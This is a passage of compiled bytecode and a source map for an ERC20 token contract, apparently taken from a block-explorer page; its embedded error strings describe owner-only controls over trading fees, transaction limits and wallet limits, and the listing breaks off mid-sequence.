4613fe857600080fd5b50565b600081359050613ffa81613fd4565b92915050565b6000806040838503121561401757614016613d13565b5b600061402585828601613d61565b925050602061403685828601613feb565b9150509250929050565b60008060006060848603121561405957614058613d13565b5b600061406786828701613d97565b935050602061407886828701613d97565b925050604061408986828701613d97565b9150509250925092565b600080604083850312156140aa576140a9613d13565b5b60006140b885828601613d97565b92505060206140c985828601613d97565b9150509250929050565b600080604083850312156140ea576140e9613d13565b5b60006140f885828601613d61565b925050602061410985828601613d61565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061415a57607f821691505b60208210810361416d5761416c614113565b5b50919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b60006141a9602083613c6c565b91506141b482614173565b602082019050919050565b600060208201905081810360008301526141d88161419c565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061424882613d76565b915061425383613d76565b925082614263576142626141df565b5b828204905092915050565b7f43616e6e6f7420736574206d61785472616e73616374696f6e416d6f756e742060008201527f6c6f776572207468616e20302e31250000000000000000000000000000000000602082015250565b60006142ca602f83613c6c565b91506142d58261426e565b604082019050919050565b600060208201905081810360008301526142f9816142bd565b9050919050565b600061430b82613d76565b915061431683613d76565b925082820190508082111561432e5761432d61420e565b5b92915050565b7f4d757374206b656570206665657320617420323025206f72206c657373000000600082015250565b600061436a601d83613c6c565b915061437582614334565b602082019050919050565b600060208201905081810360008301526143998161435d565b9050919050565b7f646f6e6500000000000000000000000000000000000000000000000000000000600082015250565b60006143d6600483613c6c565b91506143e1826143a0565b602082019050919050565b60006020820190508181036000830152614405816143c9565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b6000614468603983613c6c565b91506144738261440c565b604082019050919050565b600060208201905081810360008301526144978161445b565b9050919050565b7f616d6f756e742065786365656465640000000000000000000000000000000000600082015250565b60006144d4600f83613c6c565b91506144df8261449e565b602082019050919050565b60006020820190508181036000830152614503816144c7565b9050919050565b600081905092915050565b50565b600061452560008361450a565b915061453082614515565b600082019050919050565b600061454682614518565b9150819050919050565b7f4d757374206b656570206665657320617420323525206f72206c657373000000600082015250565b6000614586601d83613c6c565b915061459182614550565b602082019050919050565b600060208201905081810360008301526145b581614579565b9050919050565b60006145c782613d76565b91506145d283613d76565b9250817fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff048311821515161561460b5761460a61420e565b5b828202905092915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000614672602483613c6c565b915061467d82614616565b604082019050919050565b600060208201905081810360008301526146a181614665565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e3030312520746f74616c20737570706c792e0000000000000000000000602082015250565b6000614704603583613c6c565b915061470f826146a8565b604082019050919050565b60006020820190508181036000830152614733816146f7565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206869676865722074686160008201527f6e20302e352520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614796603483613c6c565b91506147a18261473a565b604082019050919050565b600060208201905081810360008301526147c581614789565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b6000614828602683613c6c565b9150614833826147cc565b604082019050919050565b600060208201905081810360008301526148578161481b565b9050919050565b7f536166654d6174683a206164646974696f6e206f766572666c6f770000000000600082015250565b6000614894601b83613c6c565b915061489f8261485e565b602082019050919050565b600060208201905081810360008301526148c381614887565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000614926602483613c6c565b9150614931826148ca565b604082019050919050565b6000602082019050818103600083015261495581614919565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006149b8602283613c6c565b91506149c38261495c565b604082019050919050565b600060208201905081810360008301526149e7816149ab565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000614a4a602583613c6c565b9150614a55826149ee565b604082019050919050565b60006020820190508181036000830152614a7981614a3d565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614adc602383613c6c565b9150614ae782614a80565b604082019050919050565b60006020820190508181036000830152614b0b81614acf565b9050919050565b7f54726164696e67206973206e6f74206163746976652e00000000000000000000600082015250565b6000614b48601683613c6c565b9150614b5382614b12565b602082019050919050565b60006020820190508181036000830152614b7781614b3b565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d61785472616e73616374696f6e416d6f756e742e0000000000000000000000602082015250565b6000614bda603583613c6c565b9150614be582614b7e565b604082019050919050565b60006020820190508181036000830152614c0981614bcd565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d61785472616e73616374696f6e416d6f756e742e00000000000000000000602082015250565b6000614c6c603683613c6c565b9150614c7782614c10565b604082019050919050565b60006020820190508181036000830152614c9b81614c5f565b9050919050565b6000614cad82613d76565b9150614cb883613d76565b925082614cc857614cc76141df565b5b828206905092915050565b7f4552524f523a204d757374206265206c657373207468616e206d61785478416d60008201527f6f756e7400000000000000000000000000000000000000000000000000000000602082015250565b6000614d2f602483613c6c565b9150614d3a82614cd3565b604082019050919050565b60006020820190508181036000830152614d5e81614d22565b9050919050565b6000614d7082613d76565b9150614d7b83613d76565b9250828203905081811115614d9357614d9261420e565b5b92915050565b60008160011c9050919050565b6000808291508390505b6001851115614df057808604811115614dcc57614dcb61420e565b5b6001851615614ddb5780820291505b8081029050614de985614d99565b9450614db0565b94509492505050565b600082614e095760019050614ec5565b81614e175760009050614ec5565b8160018114614e2d5760028114614e3757614e66565b6001915050614ec5565b60ff841115614e4957614e4861420e565b5b8360020a915084821115614e6057614e5f61420e565b5b50614ec5565b5060208310610133831016604e8410600b8410161715614e9b5782820a905083811115614e9657614e9561420e565b5b614ec5565b614ea88484846001614da6565b92509050818404811115614ebf57614ebe61420e565b5b81810290505b9392505050565b6000614ed782613d76565b9150614ee283613f73565b9250614f0f7fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8484614df9565b905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050614f8481613d4a565b92915050565b600060208284031215614fa057614f9f613d13565b5b6000614fae84828501614f75565b91505092915050565b6000819050919050565b6000614fdc614fd7614fd284614fb7565b613e4f565b613d76565b9050919050565b614fec81614fc1565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b61502781613d38565b82525050565b6000615039838361501e565b60208301905092915050565b6000602082019050919050565b600061505d82614ff2565b6150678185614ffd565b93506150728361500e565b8060005b838110156150a357815161508a888261502d565b975061509583615045565b925050600181019050615076565b5085935050505092915050565b600060a0820190506150c56000830188613ec9565b6150d26020830187614fe3565b81810360408301526150e48186615052565b90506150f36060830185613faa565b6151006080830184613ec9565b9695505050505050565b7f536166654d6174683a206d756c7469706c69636174696f6e206f766572666c6f60008201527f7700000000000000000000000000000000000000000000000000000000000000602082015250565b6000615166602183613c6c565b91506151718261510a565b604082019050919050565b6000602082019050818103600083015261519581615159565b905091905056fe45524332303a207472616e7366657220616d6f756e7420657863656564732062616c616e636545524332303a207472616e7366657220616d6f756e74206578636565647320616c6c6f77616e636545524332303a2064656372656173656420616c6c6f77616e63652062656c6f77207a65726fa264697066735822122088d7c2899de5f24f08d7b0d14687856976bce0d4e998cb86b7bdeae2f9c3aa1664736f6c63430008100033

Deployed Bytecode Sourcemap

29543:13911:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7705:100;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9872:169;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30900:64;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29619:41;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8825:108;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37693:157;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30679:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30639;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34993:255;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10523:355;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8667:93;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11287:218;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29667:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29956:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37864:125;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30490:28;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30036:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8996:127;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22170:148;;;;;;;;;;;;;:::i;:::-;;34204:121;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35483:144;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;29763:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30379;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;35639:369;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;43220:229;;;;;;;;;;;;;:::i;:::-;;21528:79;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29800:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30525:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7924:104;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37025:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30453:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30719:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36596:421;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30601:25;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12008:269;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9336:175;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;37473:208;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;31122:58;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29996:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;36406:182;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;36020:378;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;35256:215;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30258:40;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29837:35;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34600:381;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30345:27;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;9574:151;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29879:33;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;34390:135;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;30416:30;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22473:244;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;30563:31;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;29919:24;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7705:100;7759:13;7792:5;7785:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7705:100;:::o;9872:169::-;9955:4;9972:39;9981:12;:10;:12::i;:::-;9995:7;10004:6;9972:8;:39::i;:::-;10029:4;10022:11;;9872:169;;;;:::o;30900:64::-;;;;;;;;;;;;;;;;;;;;;;:::o;29619:41::-;;;;;;;;;;;;;:::o;8825:108::-;8886:7;8913:12;;8906:19;;8825:108;:::o;37693:157::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37800:9:::1;;;;;;;;;;;37772:38;;37789:9;37772:38;;;;;;;;;;;;37833:9;37821;;:21;;;;;;;;;;;;;;;;;;37693:157:::0;:::o;30679:33::-;;;;:::o;30639:::-;;;;:::o;34993:255::-;35079:15;;;;;;;;;;;35065:29;;:10;:29;;;35057:38;;;;;;35144:4;35128:13;:11;:13::i;:::-;:20;;;;:::i;:::-;35118:6;:30;;35110:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;35234:6;35211:20;:29;;;;34993:255;:::o;10523:355::-;10663:4;10680:36;10690:6;10698:9;10709:6;10680:9;:36::i;:::-;10727:121;10736:6;10744:12;:10;:12::i;:::-;10758:89;10796:6;10758:89;;;;;;;;;;;;;;;;;:11;:19;10770:6;10758:19;;;;;;;;;;;;;;;:33;10778:12;:10;:12::i;:::-;10758:33;;;;;;;;;;;;;;;;:37;;:89;;;;;:::i;:::-;10727:8;:121::i;:::-;10866:4;10859:11;;10523:355;;;;;:::o;8667:93::-;8725:5;8750:2;8743:9;;8667:93;:::o;11287:218::-;11375:4;11392:83;11401:12;:10;:12::i;:::-;11415:7;11424:50;11463:10;11424:11;:25;11436:12;:10;:12::i;:::-;11424:25;;;;;;;;;;;;;;;:34;11450:7;11424:34;;;;;;;;;;;;;;;;:38;;:50;;;;:::i;:::-;11392:8;:83::i;:::-;11493:4;11486:11;;11287:218;;;;:::o;29667:28::-;;;;;;;;;;;;;:::o;29956:33::-;;;;;;;;;;;;;:::o;37864:125::-;37929:4;37953:19;:28;37973:7;37953:28;;;;;;;;;;;;;;;;;;;;;;;;;37946:35;;37864:125;;;:::o;30490:28::-;;;;:::o;30036:31::-;;;;;;;;;;;;;:::o;8996:127::-;9070:7;9097:9;:18;9107:7;9097:18;;;;;;;;;;;;;;;;9090:25;;8996:127;;;:::o;22170:148::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;22277:1:::1;22240:40;;22261:6;;;;;;;;;;;22240:40;;;;;;;;;;;;22308:1;22291:6;;:19;;;;;;;;;;;;;;;;;;22170:148::o:0;34204:121::-;34256:4;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34290:5:::1;34273:14;;:22;;;;;;;;;;;;;;;;;;34313:4;34306:11;;34204:121:::0;:::o;35483:144::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35615:4:::1;35573:31;:39;35605:6;35573:39;;;;;;;;;;;;;;;;:46;;;;;;;;;;;;;;;;;;35483:144:::0;;:::o;29763:30::-;;;;;;;;;;;;;:::o;30379:::-;;;;:::o;35639:369::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35773:13:::1;35755:15;:31;;;;35815:13;35797:15;:31;;;;35851:7;35839:9;:19;;;;35920:9;;35902:15;;35884;;:33;;;;:::i;:::-;:45;;;;:::i;:::-;35869:12;:60;;;;35964:2;35948:12;;:18;;35940:60;;;;;;;;;;;;:::i;:::-;;;;;;;;;35639:369:::0;;;:::o;43220:229::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;43291:4:::1;43277:11;;:18;;;;;;;;;;;;;;;;;;43329:4;43314:19;;:11;;;;;;;;;;;:19;;;43306:36;;;;;;;;;;;;:::i;:::-;;;;;;;;;43367:5;43353:11;;:19;;;;;;;;;;;;;;;;;;43383:13;:11;:13::i;:::-;43412:29;43429:11;;;;;;;;;;;43412:29;;;;;;:::i;:::-;;;;;;;;43220:229::o:0;21528:79::-;21566:7;21593:6;;;;;;;;;;;21586:13;;21528:79;:::o;29800:24::-;;;;;;;;;;;;;:::o;30525:31::-;;;;:::o;7924:104::-;7980:13;8013:7;8006:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;7924:104;:::o;37025:244::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37132:13:::1;;;;;;;;;;;37124:21;;:4;:21;;::::0;37116:91:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;37220:41;37249:4;37255:5;37220:28;:41::i;:::-;37025:244:::0;;:::o;30453:24::-;;;;:::o;30719:27::-;;;;:::o;36596:421::-;36656:4;36681:19;:31;36701:10;36681:31;;;;;;;;;;;;;;;;;;;;;;;;;36673:40;;;;;;36726:7;36736:24;36746:13;;;;;;;;;;;36736:9;:24::i;:::-;36726:34;;36786:1;36781:2;:6;:23;;;;;36801:3;36796:2;:8;;;;:::i;:::-;36791:2;:13;36781:23;36773:51;;;;;;;;;;;;:::i;:::-;;;;;;;;;36837:22;36856:2;36837:18;:22::i;:::-;36870:20;36887:2;36870:16;:20::i;:::-;36904:12;36929:15;;;;;;;;;;;36921:29;;36958:21;36921:63;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;36903:81;;;37002:7;36995:14;;;;36596:421;;;;:::o;30601:25::-;;;;:::o;12008:269::-;12101:4;12118:129;12127:12;:10;:12::i;:::-;12141:7;12150:96;12189:15;12150:96;;;;;;;;;;;;;;;;;:11;:25;12162:12;:10;:12::i;:::-;12150:25;;;;;;;;;;;;;;;:34;12176:7;12150:34;;;;;;;;;;;;;;;;:38;;:96;;;;;:::i;:::-;12118:8;:129::i;:::-;12265:4;12258:11;;12008:269;;;;:::o;9336:175::-;9422:4;9439:42;9449:12;:10;:12::i;:::-;9463:9;9474:6;9439:9;:42::i;:::-;9499:4;9492:11;;9336:175;;;;:::o;37473:208::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;37610:15:::1;;;;;;;;;;;37567:59;;37590:18;37567:59;;;;;;;;;;;;37655:18;37637:15;;:36;;;;;;;;;;;;;;;;;;37473:208:::0;:::o;31122:58::-;;;;;;;;;;;;;;;;;;;;;;:::o;29996:33::-;;;;;;;;;;;;;:::o;36406:182::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36522:8:::1;36491:19;:28;36511:7;36491:28;;;;;;;;;;;;;;;;:39;;;;;;;;;;;;;;;;;;36562:7;36546:34;;;36571:8;36546:34;;;;;;:::i;:::-;;;;;;;;36406:182:::0;;:::o;36020:378::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;36156:13:::1;36137:16;:32;;;;36199:13;36180:16;:32;;;;36236:7;36223:10;:20;;;;36308:10;;36289:16;;36270;;:35;;;;:::i;:::-;:48;;;;:::i;:::-;36254:13;:64;;;;36354:2;36337:13;;:19;;36329:61;;;;;;;;;;;;:::i;:::-;;;;;;;;;36020:378:::0;;;:::o;35256:215::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;35378:4:::1;35372;35368:1;35352:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;35351:31;;;;:::i;:::-;35341:6;:41;;35333:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;35456:6;35446;:17;;;;:::i;:::-;35434:9;:29;;;;35256:215:::0;:::o;30258:40::-;;;;;;;;;;;;;:::o;29837:35::-;;;;:::o;34600:381::-;34681:4;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34737:6:::1;34733:1;34717:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:26;;;;:::i;:::-;34704:9;:39;;34696:105;;;;;;;;;;;;:::i;:::-;;;;;;;;;34852:4;34848:1;34832:13;:11;:13::i;:::-;:17;;;;:::i;:::-;:24;;;;:::i;:::-;34819:9;:37;;34811:102;;;;;;;;;;;;:::i;:::-;;;;;;;;;34944:9;34923:18;:30;;;;34970:4;34963:11;;34600:381:::0;;;:::o;30345:27::-;;;;:::o;9574:151::-;9663:7;9690:11;:18;9702:5;9690:18;;;;;;;;;;;;;;;:27;9709:7;9690:27;;;;;;;;;;;;;;;;9683:34;;9574:151;;;;:::o;29879:33::-;;;;:::o;34390:135::-;34450:4;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;34490:5:::1;34467:20;;:28;;;;;;;;;;;;;;;;;;34513:4;34506:11;;34390:135:::0;:::o;30416:30::-;;;;:::o;22473:244::-;21750:12;:10;:12::i;:::-;21740:22;;:6;;;;;;;;;;;:22;;;21732:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;22582:1:::1;22562:22;;:8;:22;;::::0;22554:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;22672:8;22643:38;;22664:6;;;;;;;;;;;22643:38;;;;;;;;;;;;22701:8;22692:6;;:17;;;;;;;;;;;;;;;;;;22473:244:::0;:::o;30563:31::-;;;;:::o;29919:24::-;;;;:::o;16572:181::-;16630:7;16650:9;16666:1;16662;:5;;;;:::i;:::-;16650:17;;16691:1;16686;:6;;16678:46;;;;;;;;;;;;:::i;:::-;;;;;;;;;16744:1;16737:8;;;16572:181;;;;:::o;343:98::-;396:7;423:10;416:17;;343:98;:::o;15194:380::-;15347:1;15330:19;;:5;:19;;;15322:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15428:1;15409:21;;:7;:21;;;15401:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;15512:6;15482:11;:18;15494:5;15482:18;;;;;;;;;;;;;;;:27;15501:7;15482:27;;;;;;;;;;;;;;;:36;;;;15550:7;15534:32;;15543:5;15534:32;;;15559:6;15534:32;;;;;;:::i;:::-;;;;;;;;15194:380;;;:::o;38195:3362::-;38343:1;38327:18;;:4;:18;;;38319:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;38420:1;38406:16;;:2;:16;;;38398:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;38489:1;38479:6;:11;38476:92;;38507:28;38523:4;38529:2;38533:1;38507:15;:28::i;:::-;38550:7;;38476:92;38591:14;;;;;;;;;;;38588:997;;;38651:7;:5;:7::i;:::-;38643:15;;:4;:15;;;;:49;;;;;38685:7;:5;:7::i;:::-;38679:13;;:2;:13;;;;38643:49;:86;;;;;38727:1;38713:16;;:2;:16;;;;38643:86;:128;;;;;38764:6;38750:21;;:2;:21;;;;38643:128;:158;;;;;38793:8;;;;;;;;;;;38792:9;38643:158;38621:953;;;38839:13;;;;;;;;;;;38835:148;;38884:19;:25;38904:4;38884:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;38913:19;:23;38933:2;38913:23;;;;;;;;;;;;;;;;;;;;;;;;;38884:52;38876:87;;;;;;;;;;;;:::i;:::-;;;;;;;;;38835:148;39052:25;:31;39078:4;39052:31;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;39088:31;:35;39120:2;39088:35;;;;;;;;;;;;;;;;;;;;;;;;;39087:36;39052:71;39048:511;;;39170:20;;39160:6;:30;;39152:96;;;;;;;;;;;;:::i;:::-;;;;;;;;;39048:511;;;39342:25;:29;39368:2;39342:29;;;;;;;;;;;;;;;;;;;;;;;;;:71;;;;;39376:31;:37;39408:4;39376:37;;;;;;;;;;;;;;;;;;;;;;;;;39375:38;39342:71;39338:221;;;39460:20;;39450:6;:30;;39442:97;;;;;;;;;;;;:::i;:::-;;;;;;;;;39338:221;39048:511;38621:953;38588:997;39599:28;39630:24;39648:4;39630:9;:24::i;:::-;39599:55;;39675:12;39714:18;;39690:20;:42;;39675:57;;39763:7;:35;;;;;39787:11;;;;;;;;;;;39763:35;:61;;;;;39816:8;;;;;;;;;;;39815:9;39763:61;:110;;;;;39842:25;:31;39868:4;39842:31;;;;;;;;;;;;;;;;;;;;;;;;;39841:32;39763:110;:153;;;;;39891:19;:25;39911:4;39891:25;;;;;;;;;;;;;;;;;;;;;;;;;39890:26;39763:153;:194;;;;;39934:19;:23;39954:2;39934:23;;;;;;;;;;;;;;;;;;;;;;;;;39933:24;39763:194;39745:338;;;39995:4;39984:8;;:15;;;;;;;;;;;;;;;;;;40028:10;:8;:10::i;:::-;40066:5;40055:8;;:16;;;;;;;;;;;;;;;;;;39745:338;40095:12;40111:8;;;;;;;;;;;40110:9;40095:24;;40220:19;:25;40240:4;40220:25;;;;;;;;;;;;;;;;;;;;;;;;;:52;;;;40249:19;:23;40269:2;40249:23;;;;;;;;;;;;;;;;;;;;;;;;;40220:52;40217:99;;;40299:5;40289:15;;40217:99;40336:12;40440:7;40437:1067;;;40491:25;:29;40517:2;40491:29;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;;40540:1;40524:13;;:17;40491:50;40487:848;;;40568:34;40598:3;40568:25;40579:13;;40568:6;:10;;:25;;;;:::i;:::-;:29;;:34;;;;:::i;:::-;40561:41;;40669:13;;40650:16;;40643:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;40621:18;;:61;;;;;;;:::i;:::-;;;;;;;;40737:13;;40724:10;;40717:4;:17;;;;:::i;:::-;:33;;;;:::i;:::-;40701:12;;:49;;;;;;;:::i;:::-;;;;;;;;40817:13;;40798:16;;40791:4;:23;;;;:::i;:::-;:39;;;;:::i;:::-;40769:18;;:61;;;;;;;:::i;:::-;;;;;;;;40881:1;40876;40853:20;;:24;;;;:::i;:::-;:29;40849:81;;40884:46;;;;;;;;;;:::i;:::-;;;;;;;;40849:81;40487:848;;;40991:25;:31;41017:4;40991:31;;;;;;;;;;;;;;;;;;;;;;;;;:51;;;;;41041:1;41026:12;;:16;40991:51;40988:347;;;41067:33;41096:3;41067:24;41078:12;;41067:6;:10;;:24;;;;:::i;:::-;:28;;:33;;;;:::i;:::-;41060:40;;41163:12;;41145:15;;41138:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;41116:18;;:59;;;;;;;:::i;:::-;;;;;;;;41229:12;;41217:9;;41210:4;:16;;;;:::i;:::-;:31;;;;:::i;:::-;41194:12;;:47;;;;;;;:::i;:::-;;;;;;;;41307:12;;41289:15;;41282:4;:22;;;;:::i;:::-;:37;;;;:::i;:::-;41260:18;;:59;;;;;;;:::i;:::-;;;;;;;;40988:347;40487:848;41373:1;41366:4;:8;41363:93;;;41398:42;41414:4;41428;41435;41398:15;:42::i;:::-;41363:93;41488:4;41478:14